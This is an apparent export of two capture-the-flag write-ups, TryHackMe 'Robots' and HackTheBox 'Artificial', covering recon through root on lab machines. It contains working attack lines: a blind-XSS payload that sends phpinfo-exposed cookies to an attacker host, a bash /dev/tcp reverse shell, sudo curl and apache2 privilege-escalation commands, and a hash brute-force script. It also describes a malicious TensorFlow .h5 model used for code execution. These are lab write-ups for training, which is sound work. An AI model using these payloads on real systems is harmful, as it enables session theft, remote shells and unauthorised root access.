[{"content":"Stealing HttpOnly protected cookies with Blind XSS, escalating an RFI to RCE, pivoting in a Docker network with Ligolo-ng, cracking some hashes and taking advantage of misconfigured permissions.\nRecon\nNmap Scan\nsudo nmap -sS robots.thm -T5\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n9000/tcp open cslistener\nFuzzing /\ndirsearch -u http://robots.thm\n[15:48:58] 200 - 74B - /robots.txt\nRobots.txt\nDisallow: /harming/humans\nDisallow: /ignoring/human/orders\nDisallow: /harm/to/self\nUpon visiting these URLs, /harm/to/self returns a 200 OK, the others a 403 Forbidden.\nFuzzing /harm/to/self\ndirsearch -u http://robots.thm/harm/to/self/\n[15:53:14] 200 - 252B - /harm/to/self/admin.php\n[15:53:39] 200 - 0B - /harm/to/self/config.php\n[15:53:42] 301 - 319B - /harm/to/self/css -> http://robots.thm/harm/to/self/css/\n[15:54:02] 200 - 394B - /harm/to/self/login.php\n[15:54:02] 302 - 0B - /harm/to/self/logout.php -> index.php\n[15:54:21] 200 - 491B - /harm/to/self/register.php\nNote: even though admin.php returns 200 OK, it is a forbidden page.\nInitial Access\nVulnerability Detection and Analysis\nSo I visited /harm/to/self/register.php and was met with:\nSo I invited myself in and created an account with username \"hacker\" and date \"15/02/2002\", and got the password for it with:\necho \"hacker1502\" | md5sum\nInside I noticed that my username was reflected in the HTML. I also noticed a weird button to view the PHP server info page. So up until now I was thinking of a Blind XSS to steal the admin cookies and that was it, but then I noticed this HttpOnly flag… 
So that left me thinking: what am I supposed to do if it is impossible to steal cookies with the HttpOnly flag set…\nStealing Cookies Via Blind XSS Despite HttpOnly Flag\nThe idea behind this lies in the fact that the cookies are exposed in the PHP server info page, in this section right here…1 And so they appear in the HTML completely unprotected. So, let's steal them.\n<img src=x onerror=\"fetch('http://robots.thm/harm/to/self/server_info.php') .then(response => response.text()) .then(text => { cookie = text.match(/Cookie.{1,2000}/)[0]; fetch('http://IP:8000/?cookie=' + encodeURIComponent(cookie)); });\">\nThis payload fetches the page that contains the cookies, extracts the \"Cookie\" line with a regex (so that we don't get the full page) and then sends a request to our server with it.\nSo we spin up a local server with Python, create a user with that payload as username and wait.\npython -m http.server 8000\nWe can just base64 decode this information and we've got ourselves the admin cookie.\nAnalyzing the Admin Panel\nWe can now visit the /admin.php that I found during the recon and we find the following. And so it turns out that we have LFI, RFI and SSRF due to that include function.\nEscalating an RFI to RCE\nWe just have to host a PHP reverse shell and include it on the server.\n<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'\"); ?>\nAnd we got a shell as www-data.\nNote: Try Penelope\nLateral Movement\nSearching the Box\nAs soon as we get in we find a config.php containing some credentials:\n$servername = \"db\";\n$username = \"robots\";\n$password = REDACTED;\n$dbname = \"web\";\nBut when we try to connect to any database we notice that there is no service running or client installed. 
Upon searching a bit more we find some clues: in the root of the filesystem there is a .dockerenv, and we see the following in /etc/hosts:\n172.18.0.3 robots.thm robots\nThis indicates that we are inside a container; what if we try to enumerate 172.18.0.0/24 to find some more services on other containers?\nLeveraging Ligolo-ng to Scan the Docker Network\nWe can use Ligolo-ng to create a tunnel from the Docker network to our attack machine, and then use nmap to see if we can find some more services. For the Ligolo setup I followed this documentation.2\nSo we run the proxy on our machine with\nsudo ./proxy -selfcert\nand upload the agent to the target and run:\n./agent -connect IP:11601 --ignore-cert\nWe can now see that we got a session on our proxy; we use the command session to attach to it and then set up an interface and a route for it.\ninterface_create --name \"ligolo\"\ninterface_add_route --name ligolo --route 172.18.0.0/24\nNow the Docker network is accessible from our attacker machine and we can use nmap like so:\nnmap 172.18.0.0/24 -e ligolo\nNmap scan report for 172.18.0.2\nPORT STATE SERVICE\n280/tcp filtered http-mgmt\n3306/tcp open mysql\n4000/tcp filtered remoteanything\n5000/tcp filtered upnp\nDatabase Connection and Password Cracking\nWe can now use the previously found credentials from config.php and connect to the database.\nmariadb -h 172.18.0.2 -u robots -P 3306 -D web\nBy using hashes.com we detected that this is just an MD5. So it might be the MD5 hash of md5(username+ddmm). I tried it on myself and it is. So by chance rgiskard could have just left his default password unchanged, and we can brute-force it. 
That's exactly what happened, and I did so with the following script.\nimport hashlib\n\nusername = \"rgiskard\"\nFoundHash = \"REDACTED\"\n\n# Default password is md5(username + ddmm); the database stores the md5 of that password\nfor month in range(1, 13):\n    for day in range(1, 32):\n        combo = username + f\"{day:02d}{month:02d}\"\n        md5_hash = hashlib.md5(combo.encode()).hexdigest()\n        md5_second_hash = hashlib.md5(md5_hash.encode()).hexdigest()\n        if md5_second_hash == FoundHash:\n            print(\"Found\")\n            print(combo)\n            print(md5_hash)\n            print(md5_second_hash)\nFinally I tried to use the found password to connect via SSH and it worked. We got an SSH connection as rgiskard.\nNote: this brute-force could be done from the start with knowledge of the username, so technically this lets people skip to this part, I guess…\nMore Lateral Movement to dolivaw\nUpon entering the machine as rgiskard there is no flag to be seen, and so it becomes obvious that we need to move to the user dolivaw. We have this sudo output:\nUser rgiskard may run the following commands on ubuntu-jammy:\n    (dolivaw) /usr/bin/curl 127.0.0.1/*\nAnd so I found this resource3 online that tells us exactly what we need to do to move to this user. We are going to use curl to write our SSH public key to dolivaw's authorized_keys and then log in via SSH. 
On our machine we generate a key.\nssh-keygen -f key\nchmod 600 key\nThen upload the public key (key.pub) to the target machine, in my case to /tmp/key.pub, and run the following command:\nsudo -u dolivaw /usr/bin/curl 127.0.0.1/ -o /tmp/ignore file:///tmp/key.pub -o /home/dolivaw/.ssh/authorized_keys\nNow we can connect to dolivaw via SSH like so and retrieve the user flag.\nssh dolivaw@10.66.183.185 -i key\nPrivesc\nAs dolivaw the story kind of repeats itself; it is again a sudo trick, because we have this:\nUser dolivaw may run the following commands on ubuntu-jammy:\n    (ALL) NOPASSWD: /usr/sbin/apache2\nAnd so running this command4 will get us the root flag:\nsudo apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /root/root.txt'\nSources\n1. Stealing Cookies With PhpInfo()\n2. Ligolo-ng Documentation\n3. Sudo Curl Privesc\n4. Apache2 File Read\n","permalink":"https://vitorribeiro.sh/writeups/robots/","summary":"\u003cp\u003eStealing HttpOnly protected cookies with Blind XSS, escalating an RFI to RCE, pivoting in a Docker network with Ligolo-ng, cracking some hashes and taking advantage of misconfigured permissions.\u003c/p\u003e","title":"THM - Robots"},{"content":"Exploiting a TensorFlow Remote Code Execution with a Malicious .h5 Model and Escalating to Root via a Misconfigured Backrest Service\nRecon\nNmap Scan\nsudo nmap -A 10.10.11.74 -T5\nPORT STATE SERVICE REASON VERSION\n22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu\n80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)\nInitial Access\nVulnerability Identification\nUpon registering on the platform we encounter the following. 
The website lets us upload our .h5 AI models; upon some research I found this article1 stating that we can embed payloads into AI models.\nLater I found this payload.2\nNote that the payload has to be crafted on the specific TensorFlow version 2.13.1 stated in the requirements.txt.\nPayload Crafting and Exploitation\nSince I had a newer Python version not supporting TensorFlow 2.13.1, I used pyenv to manage older Python versions.\npyenv install 3.10.13\npyenv virtualenv 3.10.13 tf-2.13-env\npyenv activate tf-2.13-env\npip install tensorflow==2.13.1\nInside this env I ran the script with my IP and port, and started a nc listener:\nnc -lvnp 4444\nAfter that I uploaded the file Exploit.h5 to the website, ran it and got a shell as app.\nLateral Movement\nSearching the Box\nInside the box I found a file named users.db that I exfiltrated to my host. I opened it with a SQLite GUI and got:\nDecryption\nI pasted the hashes on hashes.com and got the results.\ngael@artificial.htb : c99175974b6e192936d97224638a34f8 : REDACTED\nroyer@artificial.htb : bc25b1f80f544c0ab451c02a3dca9fc6 : REDACTED\nIn the end, royer was useless.\nUser Flag\nWe got a connection to the box as gael via SSH using the cracked password. 
And like so we got the user flag.\nPrivilege Escalation\nSearching the Box\nAfter searching for a while we found that gael is sysadmin and has access to a backup at /var/backups/backrest_backup.tar.gz. We also found that the box has port 9898 open, serving the Backrest web service.\nSearching Backup Folder\nInside the folder we found config.json, which contains:\n\"name\": \"backrest_root\",\n\"passwordBcrypt\": \"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP\"\nUsing the hashes.com tool to detect the hash type we see that it is base64 encoded, and decoding it gives:\n$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO\nUsing the same technique we found it to be bcrypt, as expected, and after trying hashes.com with no success I tried hashcat with rockyou and got:\n$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO:REDACTED\nAnalyzing open port 9898\nWe forward that open port to our host via SSH:\nssh -L 9898:localhost:9898 gael@10.10.10.10\nPrompted to log in, we used the previous creds with success.\nGetting Root\nThis is a web UI for restic backups.3\nInside the UI we went to Repos and selected Run Command, and we got a prompt. 
After using the command help we found out about:\nsnapshots - to see snapshot IDs (backups)\nls [snapshotID] - list directories\ndump [snapshotID] [file path] - to retrieve data from a file\nSo the final command to get the flag was:\ndump 64bc9183 /root/root.txt\nSources\n1. Embedding Payloads Into AI Models\n2. AI Model Payload\n3. Backrest GitHub Page\n","permalink":"https://vitorribeiro.sh/writeups/artificial/","summary":"\u003cp\u003eExploiting a TensorFlow Remote Code Execution with a Malicious .h5 Model and Escalating to Root via a Misconfigured Backrest Service\u003c/p\u003e","title":"HTB - Artificial"}]